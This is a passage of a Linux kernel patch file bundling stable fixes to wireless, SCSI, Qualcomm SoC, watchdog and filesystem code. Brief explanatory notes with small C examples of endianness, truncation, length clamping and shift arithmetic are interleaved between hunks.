+ 	rx_status->band = hw->conf.chandef.chan->band;
+ 	if (get_rx_desc_crc32(pdesc))
+ 		rx_status->flag |= RX_FLAG_FAILED_FCS_CRC;
+-	if (!get_rx_desc_swdec(pdesc))
+-		rx_status->flag |= RX_FLAG_DECRYPTED;
+ 	if (get_rx_desc_bw(pdesc))
+ 		rx_status->bw = RATE_INFO_BW_40;
+ 	if (get_rx_desc_rxht(pdesc))
+@@ -442,9 +443,7 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
+ 	if (phystatus) {
+ 		p_drvinfo = (struct rx_fwinfo_92d *)(skb->data +
+ 						     stats->rx_bufshift);
+-		_rtl92de_translate_rx_signal_stuff(hw,
+-						   skb, stats,
+-						   (struct rx_desc_92d *)pdesc,
++		_rtl92de_translate_rx_signal_stuff(hw, skb, stats, pdesc,
+ 						   p_drvinfo);
+ 	}
+ 	/*rx_status->qual = stats->signal; */
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
+index d01578875cd5f..eb3f768140b5b 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
+@@ -14,6 +14,15 @@
+ #define USB_HWDESC_HEADER_LEN			32
+ #define CRCLENGTH				4
+ 
++enum rtl92d_rx_desc_enc {
++	RX_DESC_ENC_NONE	= 0,
++	RX_DESC_ENC_WEP40	= 1,
++	RX_DESC_ENC_TKIP_WO_MIC	= 2,
++	RX_DESC_ENC_TKIP_MIC	= 3,
++	RX_DESC_ENC_AES		= 4,
++	RX_DESC_ENC_WEP104	= 5,
++};
++
+ /* macros to read/write various fields in RX or TX descriptors */
+ 
+ static inline void set_tx_desc_pkt_size(__le32 *__pdesc, u32 __val)
+@@ -246,6 +255,11 @@ static inline u32 get_rx_desc_drv_info_size(__le32 *__pdesc)
+ 	return le32_get_bits(*__pdesc, GENMASK(19, 16));
+ }
+ 
++static inline u32 get_rx_desc_enc_type(__le32 *__pdesc)
++{
++	return le32_get_bits(*__pdesc, GENMASK(22, 20));
++}
++
+ static inline u32 get_rx_desc_shift(__le32 *__pdesc)
+ {
+ 	return le32_get_bits(*__pdesc, GENMASK(25, 24));
+@@ -380,10 +394,17 @@ struct rx_fwinfo_92d {
+ 	u8 csi_target[2];
+ 	u8 sigevm;
+ 	u8 max_ex_pwr;
++#ifdef __LITTLE_ENDIAN
+ 	u8 ex_intf_flag:1;
+ 	u8 sgi_en:1;
+ 	u8 rxsc:2;
+ 	u8 reserve:4;
++#else
++	u8 reserve:4;
++	u8 rxsc:2;
++	u8 sgi_en:1;
++	u8 ex_intf_flag:1;
++#endif
+ } __packed;
+ 
+ struct tx_desc_92d {
+@@ -488,64 +509,6 @@ struct tx_desc_92d {
+ 	u32 reserve_pass_pcie_mm_limit[4];
+ } __packed;
+ 
+-struct rx_desc_92d {
+-	u32 length:14;
+-	u32 crc32:1;
+-	u32 icverror:1;
+-	u32 drv_infosize:4;
+-	u32 security:3;
+-	u32 qos:1;
+-	u32 shift:2;
+-	u32 phystatus:1;
+-	u32 swdec:1;
+-	u32 lastseg:1;
+-	u32 firstseg:1;
+-	u32 eor:1;
+-	u32 own:1;
+-
+-	u32 macid:5;
+-	u32 tid:4;
+-	u32 hwrsvd:5;
+-	u32 paggr:1;
+-	u32 faggr:1;
+-	u32 a1_fit:4;
+-	u32 a2_fit:4;
+-	u32 pam:1;
+-	u32 pwr:1;
+-	u32 moredata:1;
+-	u32 morefrag:1;
+-	u32 type:2;
+-	u32 mc:1;
+-	u32 bc:1;
+-
+-	u32 seq:12;
+-	u32 frag:4;
+-	u32 nextpktlen:14;
+-	u32 nextind:1;
+-	u32 rsvd:1;
+-
+-	u32 rxmcs:6;
+-	u32 rxht:1;
+-	u32 amsdu:1;
+-	u32 splcp:1;
+-	u32 bandwidth:1;
+-	u32 htc:1;
+-	u32 tcpchk_rpt:1;
+-	u32 ipcchk_rpt:1;
+-	u32 tcpchk_valid:1;
+-	u32 hwpcerr:1;
+-	u32 hwpcind:1;
+-	u32 iv0:16;
+-
+-	u32 iv1;
+-
+-	u32 tsfl;
+-
+-	u32 bufferaddress;
+-	u32 bufferaddress64;
+-
+-} __packed;
+-
+ void rtl92de_tx_fill_desc(struct ieee80211_hw *hw,
+ 			  struct ieee80211_hdr *hdr, u8 *pdesc,
+ 			  u8 *pbd_desc_tx, struct ieee80211_tx_info *info,
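
The #ifdef __LITTLE_ENDIAN block added to rx_fwinfo_92d above is needed because C bit-field ordering within a storage unit is ABI-defined and is reversed between the common little- and big-endian ABIs, so structs that must match a hardware layout spell out both orders. A small standalone illustration (GCC/Clang byte-order macros assumed):

#include <stdio.h>
#include <string.h>

struct flags {
#if defined(__BYTE_ORDER__) && __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
	unsigned char ex_intf_flag:1, sgi_en:1, rxsc:2, reserve:4;
#else
	unsigned char reserve:4, rxsc:2, sgi_en:1, ex_intf_flag:1;
#endif
};

int main(void)
{
	struct flags f = { .sgi_en = 1 };
	unsigned char raw;

	memcpy(&raw, &f, 1);
	printf("raw = 0x%02x\n", raw);	/* 0x02 on typical little-endian ABIs */
	return 0;
}
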
+diff --git a/drivers/net/wireless/realtek/rtw89/mac80211.c b/drivers/net/wireless/realtek/rtw89/mac80211.c
+index a8f478f0cde90..3a108b13aa596 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw89/mac80211.c
+@@ -263,7 +263,7 @@ static u8 rtw89_aifsn_to_aifs(struct rtw89_dev *rtwdev,
+ 	u8 sifs;
+ 
+ 	slot_time = vif->bss_conf.use_short_slot ? 9 : 20;
+-	sifs = chan->band_type == RTW89_BAND_5G ? 16 : 10;
++	sifs = chan->band_type == RTW89_BAND_2G ? 10 : 16;
+ 
+ 	return aifsn * slot_time + sifs;
+ }
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 4a012962cd441..58b6f7d4cab8b 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -948,7 +948,8 @@ u32 __rtw89_pci_check_and_reclaim_tx_resource_noio(struct rtw89_dev *rtwdev,
+ 
+ 	spin_lock_bh(&rtwpci->trx_lock);
+ 	cnt = rtw89_pci_get_avail_txbd_num(tx_ring);
+-	cnt = min(cnt, wd_ring->curr_num);
++	if (txch != RTW89_TXCH_CH12)
++		cnt = min(cnt, wd_ring->curr_num);
+ 	spin_unlock_bh(&rtwpci->trx_lock);
+ 
+ 	return cnt;
+diff --git a/drivers/s390/crypto/ap_bus.c b/drivers/s390/crypto/ap_bus.c
+index 4c0f9fe1ba779..c692b55dd1169 100644
+--- a/drivers/s390/crypto/ap_bus.c
++++ b/drivers/s390/crypto/ap_bus.c
+@@ -1088,7 +1088,7 @@ static int hex2bitmap(const char *str, unsigned long *bitmap, int bits)
+  */
+ static int modify_bitmap(const char *str, unsigned long *bitmap, int bits)
+ {
+-	int a, i, z;
++	unsigned long a, i, z;
+ 	char *np, sign;
+ 
+ 	/* bits needs to be a multiple of 8 */
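
The int-to-unsigned-long change above matters because the parsed bit positions come from strtoul-style helpers that return unsigned long; storing them in an int silently truncates large values. A tiny standalone illustration (behavior shown is for typical 64-bit targets):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	unsigned long parsed = strtoul("4294967296", NULL, 0);	/* 2^32 */
	int truncated = (int)parsed;	/* implementation-defined: 0 here */

	printf("unsigned long: %lu, int: %d\n", parsed, truncated);
	return 0;
}
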
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index e70ab8db30142..7b79cd435d7ab 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -350,6 +350,13 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 		if (result < SCSI_VPD_HEADER_SIZE)
+ 			return 0;
+ 
++		if (result > sizeof(vpd)) {
++			dev_warn_once(&sdev->sdev_gendev,
++				      "%s: long VPD page 0 length: %d bytes\n",
++				      __func__, result);
++			result = sizeof(vpd);
++		}
++
+ 		result -= SCSI_VPD_HEADER_SIZE;
+ 		if (!memchr(&vpd[SCSI_VPD_HEADER_SIZE], page, result))
+ 			return 0;
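
The added check is the standard clamp-before-scan pattern: never trust a device-reported length past the size of the local buffer you are about to search. A minimal sketch with hypothetical names, not the driver's own:

#include <stddef.h>

/* Clamp a device-reported payload length to the local buffer size
 * before handing it to memchr()/memcpy()-style scanners. */
static size_t clamp_reported_len(size_t reported, size_t bufsize)
{
	return reported > bufsize ? bufsize : reported;
}
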
+diff --git a/drivers/soc/qcom/cmd-db.c b/drivers/soc/qcom/cmd-db.c
+index 629a7188b576f..2a7d089ec7270 100644
+--- a/drivers/soc/qcom/cmd-db.c
++++ b/drivers/soc/qcom/cmd-db.c
+@@ -1,6 +1,10 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* Copyright (c) 2016-2018, 2020, The Linux Foundation. All rights reserved. */
++/*
++ * Copyright (c) 2016-2018, 2020, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
++ */
+ 
++#include <linux/bitfield.h>
+ #include <linux/debugfs.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+@@ -17,6 +21,8 @@
+ #define MAX_SLV_ID		8
+ #define SLAVE_ID_MASK		0x7
+ #define SLAVE_ID_SHIFT		16
++#define SLAVE_ID(addr)		FIELD_GET(GENMASK(19, 16), addr)
++#define VRM_ADDR(addr)		FIELD_GET(GENMASK(19, 4), addr)
+ 
+ /**
+  * struct entry_header: header for each entry in cmddb
+@@ -220,6 +226,30 @@ const void *cmd_db_read_aux_data(const char *id, size_t *len)
+ }
+ EXPORT_SYMBOL(cmd_db_read_aux_data);
+ 
++/**
++ * cmd_db_match_resource_addr() - Check whether two resource addresses match
++ *
++ * @addr1: Resource address to compare
++ * @addr2: Resource address to compare
++ *
++ * Return: true if two addresses refer to the same resource, false otherwise
++ */
++bool cmd_db_match_resource_addr(u32 addr1, u32 addr2)
++{
++	/*
++	 * Each RPMh VRM accelerator resource has 3 or 4 contiguous 4-byte
++	 * aligned addresses associated with it. Ignore the offset to check
++	 * for VRM requests.
++	 */
++	if (addr1 == addr2)
++		return true;
++	else if (SLAVE_ID(addr1) == CMD_DB_HW_VRM && VRM_ADDR(addr1) == VRM_ADDR(addr2))
++		return true;
++
++	return false;
++}
++EXPORT_SYMBOL_GPL(cmd_db_match_resource_addr);
++
+ /**
+  * cmd_db_read_slave_id - Get the slave ID for a given resource address
+  *
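
cmd_db_match_resource_addr() above treats two VRM addresses as equal when they differ only in the low 4 offset bits, since each VRM resource spans 3 or 4 contiguous 4-byte registers. A userspace restatement with the masks expanded (the CMD_DB_HW_VRM value here is an assumption for illustration):

#include <stdbool.h>
#include <stdint.h>

#define CMD_DB_HW_VRM	3			/* assumed enum value */
#define SLAVE_ID(a)	(((a) >> 16) & 0xf)	/* FIELD_GET(GENMASK(19, 16), a) */
#define VRM_ADDR(a)	(((a) >> 4) & 0xffff)	/* FIELD_GET(GENMASK(19, 4), a) */

static bool match_resource_addr(uint32_t a1, uint32_t a2)
{
	if (a1 == a2)
		return true;
	return SLAVE_ID(a1) == CMD_DB_HW_VRM && VRM_ADDR(a1) == VRM_ADDR(a2);
}
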
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 01c2f50cb97ef..5e7bb6338707d 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
+  * Copyright (c) 2016-2018, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2023-2024, Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ 
+ #define pr_fmt(fmt) "%s " fmt, KBUILD_MODNAME
+@@ -519,7 +520,7 @@ static int check_for_req_inflight(struct rsc_drv *drv, struct tcs_group *tcs,
+ 		for_each_set_bit(j, &curr_enabled, MAX_CMDS_PER_TCS) {
+ 			addr = read_tcs_cmd(drv, RSC_DRV_CMD_ADDR, i, j);
+ 			for (k = 0; k < msg->num_cmds; k++) {
+-				if (addr == msg->cmds[k].addr)
++				if (cmd_db_match_resource_addr(msg->cmds[k].addr, addr))
+ 					return -EBUSY;
+ 			}
+ 		}
+diff --git a/drivers/thermal/qcom/lmh.c b/drivers/thermal/qcom/lmh.c
+index 4122a51e98741..97cf0dc3a6c38 100644
+--- a/drivers/thermal/qcom/lmh.c
++++ b/drivers/thermal/qcom/lmh.c
+@@ -95,6 +95,9 @@ static int lmh_probe(struct platform_device *pdev)
+ 	unsigned int enable_alg;
+ 	u32 node_id;
+ 
++	if (!qcom_scm_is_available())
++		return -EPROBE_DEFER;
++
+ 	lmh_data = devm_kzalloc(dev, sizeof(*lmh_data), GFP_KERNEL);
+ 	if (!lmh_data)
+ 		return -ENOMEM;
+diff --git a/drivers/video/fbdev/savage/savagefb_driver.c b/drivers/video/fbdev/savage/savagefb_driver.c
+index a7b63c475f954..78eee242fc992 100644
+--- a/drivers/video/fbdev/savage/savagefb_driver.c
++++ b/drivers/video/fbdev/savage/savagefb_driver.c
+@@ -2277,7 +2277,10 @@ static int savagefb_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	if (info->var.xres_virtual > 0x1000)
+ 		info->var.xres_virtual = 0x1000;
+ #endif
+-	savagefb_check_var(&info->var, info);
++	err = savagefb_check_var(&info->var, info);
++	if (err)
++		goto failed;
++
+ 	savagefb_set_fix(info);
+ 
+ 	/*
+diff --git a/drivers/watchdog/rti_wdt.c b/drivers/watchdog/rti_wdt.c
+index ea617c0f97470..fe27039f6f5ae 100644
+--- a/drivers/watchdog/rti_wdt.c
++++ b/drivers/watchdog/rti_wdt.c
+@@ -52,6 +52,8 @@
+ 
+ #define DWDST			BIT(1)
+ 
++#define MAX_HW_ERROR		250
++
+ static int heartbeat = DEFAULT_HEARTBEAT;
+ 
+ /*
+@@ -90,7 +92,7 @@ static int rti_wdt_start(struct watchdog_device *wdd)
+ 	 * to be 50% or less than that; we obviously want to configure the open
+ 	 * window as large as possible so we select the 50% option.
+ 	 */
+-	wdd->min_hw_heartbeat_ms = 500 * wdd->timeout;
++	wdd->min_hw_heartbeat_ms = 520 * wdd->timeout + MAX_HW_ERROR;
+ 
+ 	/* Generate NMI when wdt expires */
+ 	writel_relaxed(RTIWWDRX_NMI, wdt->base + RTIWWDRXCTRL);
+@@ -124,31 +126,33 @@ static int rti_wdt_setup_hw_hb(struct watchdog_device *wdd, u32 wsize)
+ 	 * be petted during the open window; not too early or not too late.
+ 	 * The HW configuration options only allow for the open window size
+ 	 * to be 50% or less than that.
++	 * To avoid any glitches, we add a safety margin of 2% plus the
++	 * maximum hardware error.
+ 	 */
+ 	switch (wsize) {
+ 	case RTIWWDSIZE_50P:
+-		/* 50% open window => 50% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 500 * heartbeat;
++		/* 50% open window => 52% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 520 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_25P:
+-		/* 25% open window => 75% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 750 * heartbeat;
++		/* 25% open window => 77% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 770 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_12P5:
+-		/* 12.5% open window => 87.5% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 875 * heartbeat;
++		/* 12.5% open window => 89.5% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 895 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_6P25:
+-		/* 6.5% open window => 93.5% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 935 * heartbeat;
++		/* 6.5% open window => 95.5% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 955 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_3P125:
+-		/* 3.125% open window => 96.9% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 969 * heartbeat;
++		/* 3.125% open window => 98.9% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 989 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	default:
+@@ -221,14 +225,6 @@ static int rti_wdt_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * If watchdog is running at 32k clock, it is not accurate.
+-	 * Adjust frequency down in this case so that we don't pet
+-	 * the watchdog too often.
+-	 */
+-	if (wdt->freq < 32768)
+-		wdt->freq = wdt->freq * 9 / 10;
+-
+ 	pm_runtime_enable(dev);
+ 	ret = pm_runtime_resume_and_get(dev);
+ 	if (ret < 0) {
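
The new minimum-heartbeat numbers above fold the 2% margin and MAX_HW_ERROR straight into the per-second multiplier: the timeout is in seconds, so 520 * timeout yields 52% of the period in milliseconds. A quick standalone check of that arithmetic:

#include <stdio.h>

int main(void)
{
	unsigned int timeout_s = 60;		/* example watchdog timeout */
	unsigned int max_hw_error_ms = 250;	/* MAX_HW_ERROR */
	/* 50% open window + 2% margin => 52% of the period, in ms */
	unsigned int min_hb_ms = 520 * timeout_s + max_hw_error_ms;

	printf("min_hw_heartbeat_ms = %u\n", min_hb_ms);	/* 31450 */
	return 0;
}
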
+diff --git a/fs/9p/vfs_dentry.c b/fs/9p/vfs_dentry.c
+index f89f01734587b..55990098795ec 100644
+--- a/fs/9p/vfs_dentry.c
++++ b/fs/9p/vfs_dentry.c
+@@ -50,12 +50,17 @@ static int v9fs_cached_dentry_delete(const struct dentry *dentry)
+ static void v9fs_dentry_release(struct dentry *dentry)
+ {
+ 	struct hlist_node *p, *n;
++	struct hlist_head head;
+ 
+ 	p9_debug(P9_DEBUG_VFS, " dentry: %pd (%p)\n",
+ 		 dentry, dentry);
+-	hlist_for_each_safe(p, n, (struct hlist_head *)&dentry->d_fsdata)
++
++	spin_lock(&dentry->d_lock);
++	hlist_move_list((struct hlist_head *)&dentry->d_fsdata, &head);
++	spin_unlock(&dentry->d_lock);
++
++	hlist_for_each_safe(p, n, &head)
+ 		p9_fid_put(hlist_entry(p, struct p9_fid, dlist));
+-	dentry->d_fsdata = NULL;
+ }
+ 
+ static int v9fs_lookup_revalidate(struct dentry *dentry, unsigned int flags)
+diff --git a/fs/afs/mntpt.c b/fs/afs/mntpt.c
+index 97f50e9fd9eb0..297487ee83231 100644
+--- a/fs/afs/mntpt.c
++++ b/fs/afs/mntpt.c
+@@ -140,6 +140,11 @@ static int afs_mntpt_set_params(struct fs_context *fc, struct dentry *mntpt)
+ 		put_page(page);
+ 		if (ret < 0)
+ 			return ret;
++
++		/* Don't cross a backup volume mountpoint from a backup volume */
++		if (src_as->volume && src_as->volume->type == AFSVL_BACKVOL &&
++		    ctx->type == AFSVL_BACKVOL)
++			return -ENODEV;
+ 	}
+ 
+ 	return 0;
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 7c33b28c02aeb..b7a5bf88193f9 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -4845,18 +4845,23 @@ static int btrfs_log_prealloc_extents(struct btrfs_trans_handle *trans,
+ 			path->slots[0]++;
+ 			continue;
+ 		}
+-		if (!dropped_extents) {
+-			/*
+-			 * Avoid logging extent items logged in past fsync calls
+-			 * and leading to duplicate keys in the log tree.
+-			 */
++		/*
++		 * Avoid overlapping items in the log tree. The first time we
++		 * get here, get rid of everything from a past fsync. After
++		 * that, if the current extent starts before the end of the last
++		 * extent we copied, truncate the last one. This can happen if
++		 * an ordered extent completion modifies the subvolume tree
++		 * while btrfs_next_leaf() has the tree unlocked.
++		 */
++		if (!dropped_extents || key.offset < truncate_offset) {
+ 			ret = truncate_inode_items(trans, root->log_root, inode,
+-						   truncate_offset,
++						   min(key.offset, truncate_offset),
+ 						   BTRFS_EXTENT_DATA_KEY);
+ 			if (ret)
+ 				goto out;
+ 			dropped_extents = true;
+ 		}
++		truncate_offset = btrfs_file_extent_end(path);
+ 		if (ins_nr == 0)
+ 			start_slot = slot;
+ 		ins_nr++;
+diff --git a/fs/ext4/mballoc.h b/fs/ext4/mballoc.h
+index 00b3898df4a76..538703499d083 100644
+--- a/fs/ext4/mballoc.h
++++ b/fs/ext4/mballoc.h
+@@ -180,8 +180,8 @@ struct ext4_allocation_context {
+ 
+ 	__u32 ac_groups_considered;
+ 	__u32 ac_flags;		/* allocation hints */
++	__u32 ac_groups_linear_remaining;
+ 	__u16 ac_groups_scanned;
+-	__u16 ac_groups_linear_remaining;
+ 	__u16 ac_found;
+ 	__u16 ac_tail;
+ 	__u16 ac_buddy;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index eaed9fd2f890c..28d00ed833db4 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -3076,8 +3076,10 @@ ext4_xattr_block_cache_find(struct inode *inode,
+ 
+ 		bh = ext4_sb_bread(inode->i_sb, ce->e_value, REQ_PRIO);
+ 		if (IS_ERR(bh)) {
+-			if (PTR_ERR(bh) == -ENOMEM)
++			if (PTR_ERR(bh) == -ENOMEM) {
++				mb_cache_entry_put(ea_block_cache, ce);
+ 				return NULL;
++			}
+ 			bh = NULL;
+ 			EXT4_ERROR_INODE(inode, "block %lu read error",
+ 					 (unsigned long)ce->e_value);
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 869bb6ec107cc..35b1c672644ee 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -298,6 +298,12 @@ static bool sanity_check_inode(struct inode *inode, struct page *node_page)
+ 		}
+ 	}
+ 
++	if (fi->i_xattr_nid && f2fs_check_nid_range(sbi, fi->i_xattr_nid)) {
++		f2fs_warn(sbi, "%s: inode (ino=%lx) has corrupted i_xattr_nid: %u, run fsck to fix.",
++			  __func__, inode->i_ino, fi->i_xattr_nid);
++		return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index b3b801e7c4bc5..d921d7b7bec64 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -695,9 +695,9 @@ unsigned long nfs_block_bits(unsigned long bsize, unsigned char *nrbitsp)
+ 	if ((bsize & (bsize - 1)) || nrbitsp) {
+ 		unsigned char	nrbits;
+ 
+-		for (nrbits = 31; nrbits && !(bsize & (1 << nrbits)); nrbits--)
++		for (nrbits = 31; nrbits && !(bsize & (1UL << nrbits)); nrbits--)
+ 			;
+-		bsize = 1 << nrbits;
++		bsize = 1UL << nrbits;
+ 		if (nrbitsp)
+ 			*nrbitsp = nrbits;
+ 	}
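
The 1UL matters because 1 << 31 is undefined behavior for a 32-bit signed int, and on 64-bit kernels bsize is an unsigned long that can legitimately carry bit 31. A standalone sketch of the rounding, with the nrbitsp out-parameter dropped for brevity:

#include <stdio.h>

static unsigned long round_down_pow2(unsigned long bsize)
{
	unsigned char nrbits;

	if (bsize & (bsize - 1)) {	/* not already a power of two */
		for (nrbits = 31; nrbits && !(bsize & (1UL << nrbits)); nrbits--)
			;
		bsize = 1UL << nrbits;
	}
	return bsize;
}

int main(void)
{
	printf("%lu\n", round_down_pow2(3000));	/* prints 2048 */
	return 0;
}
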
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 7cc74f7451d67..bda3050817c90 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5441,7 +5441,7 @@ static bool nfs4_read_plus_not_supported(struct rpc_task *task,
+ 	struct rpc_message *msg = &task->tk_msg;
+ 
+ 	if (msg->rpc_proc == &nfs4_procedures[NFSPROC4_CLNT_READ_PLUS] &&
+-	    server->caps & NFS_CAP_READ_PLUS && task->tk_status == -ENOTSUPP) {
++	    task->tk_status == -ENOTSUPP) {
+ 		server->caps &= ~NFS_CAP_READ_PLUS;
+ 		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+ 		rpc_restart_call_prepare(task);
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 006df4eac9fab..dfc459a62fb30 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2159,8 +2159,10 @@ static void nilfs_segctor_start_timer(struct nilfs_sc_info *sci)
+ {
+ 	spin_lock(&sci->sc_state_lock);
+ 	if (!(sci->sc_state & NILFS_SEGCTOR_COMMIT)) {
+-		sci->sc_timer.expires = jiffies + sci->sc_interval;
+-		add_timer(&sci->sc_timer);
++		if (sci->sc_task) {
++			sci->sc_timer.expires = jiffies + sci->sc_interval;
++			add_timer(&sci->sc_timer);
++		}
+ 		sci->sc_state |= NILFS_SEGCTOR_COMMIT;
+ 	}
+ 	spin_unlock(&sci->sc_state_lock);
+@@ -2378,10 +2380,21 @@ int nilfs_construct_dsync_segment(struct super_block *sb, struct inode *inode,
+  */
+ static void nilfs_segctor_accept(struct nilfs_sc_info *sci)
+ {
++	bool thread_is_alive;
++
+ 	spin_lock(&sci->sc_state_lock);
+ 	sci->sc_seq_accepted = sci->sc_seq_request;
++	thread_is_alive = (bool)sci->sc_task;
+ 	spin_unlock(&sci->sc_state_lock);
+-	del_timer_sync(&sci->sc_timer);
++
++	/*
++	 * This function does not race with the log writer thread's
++	 * termination.  Therefore, deleting sc_timer, which should not be
++	 * done after the log writer thread exits, can be done safely outside
++	 * the area protected by sc_state_lock.
++	 */
++	if (thread_is_alive)
++		del_timer_sync(&sci->sc_timer);
+ }
+ 
+ /**
+@@ -2407,7 +2420,7 @@ static void nilfs_segctor_notify(struct nilfs_sc_info *sci, int mode, int err)
+ 			sci->sc_flush_request &= ~FLUSH_DAT_BIT;
+ 
+ 		/* re-enable timer if checkpoint creation was not done */
+-		if ((sci->sc_state & NILFS_SEGCTOR_COMMIT) &&
++		if ((sci->sc_state & NILFS_SEGCTOR_COMMIT) && sci->sc_task &&
+ 		    time_before(jiffies, sci->sc_timer.expires))
+ 			add_timer(&sci->sc_timer);
+ 	}
+@@ -2597,6 +2610,7 @@ static int nilfs_segctor_thread(void *arg)
+ 	int timeout = 0;
+ 
+ 	sci->sc_timer_task = current;
++	timer_setup(&sci->sc_timer, nilfs_construction_timeout, 0);
+ 
+ 	/* start sync. */
+ 	sci->sc_task = current;
+@@ -2663,6 +2677,7 @@ static int nilfs_segctor_thread(void *arg)
+  end_thread:
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
++	del_timer_sync(&sci->sc_timer);
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
+ 	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+@@ -2726,7 +2741,6 @@ static struct nilfs_sc_info *nilfs_segctor_new(struct super_block *sb,
+ 	INIT_LIST_HEAD(&sci->sc_gc_inodes);
+ 	INIT_LIST_HEAD(&sci->sc_iput_queue);
+ 	INIT_WORK(&sci->sc_iput_work, nilfs_iput_work_func);
+-	timer_setup(&sci->sc_timer, nilfs_construction_timeout, 0);
+ 
+ 	sci->sc_interval = HZ * NILFS_SC_DEFAULT_TIMEOUT;
+ 	sci->sc_mjcp_freq = HZ * NILFS_SC_DEFAULT_SR_FREQ;
+@@ -2812,7 +2826,6 @@ static void nilfs_segctor_destroy(struct nilfs_sc_info *sci)
+ 
+ 	down_write(&nilfs->ns_segctor_sem);
+ 
+-	del_timer_sync(&sci->sc_timer);
+ 	kfree(sci);
+ }
+ 
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 69dbd08fd4419..763cf946e8491 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -213,8 +213,8 @@ smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
+ 	}
+ 	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
+ 	if (!tcon) {
+-		cifs_put_smb_ses(ses);
+ 		spin_unlock(&cifs_tcp_ses_lock);
++		cifs_put_smb_ses(ses);
+ 		return NULL;
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+diff --git a/include/linux/mmc/slot-gpio.h b/include/linux/mmc/slot-gpio.h
+index 4ae2f2908f993..d4a1567c94d0d 100644
+--- a/include/linux/mmc/slot-gpio.h
++++ b/include/linux/mmc/slot-gpio.h
+@@ -20,6 +20,7 @@ int mmc_gpiod_request_cd(struct mmc_host *host, const char *con_id,
+ 			 unsigned int debounce);
+ int mmc_gpiod_request_ro(struct mmc_host *host, const char *con_id,
+ 			 unsigned int idx, unsigned int debounce);
++int mmc_gpiod_set_cd_config(struct mmc_host *host, unsigned long config);
+ void mmc_gpio_set_cd_isr(struct mmc_host *host,
+ 			 irqreturn_t (*isr)(int irq, void *dev_id));
+ int mmc_gpio_set_cd_wake(struct mmc_host *host, bool on);
+diff --git a/include/linux/smp.h b/include/linux/smp.h
+index a80ab58ae3f1d..5b977f20c1399 100644
+--- a/include/linux/smp.h
++++ b/include/linux/smp.h
+@@ -211,6 +211,8 @@ smp_call_function_any(const struct cpumask *mask, smp_call_func_t func,
+ static inline void kick_all_cpus_sync(void) {  }
+ static inline void wake_up_all_idle_cpus(void) {  }
+ 
++#define setup_max_cpus 0
++
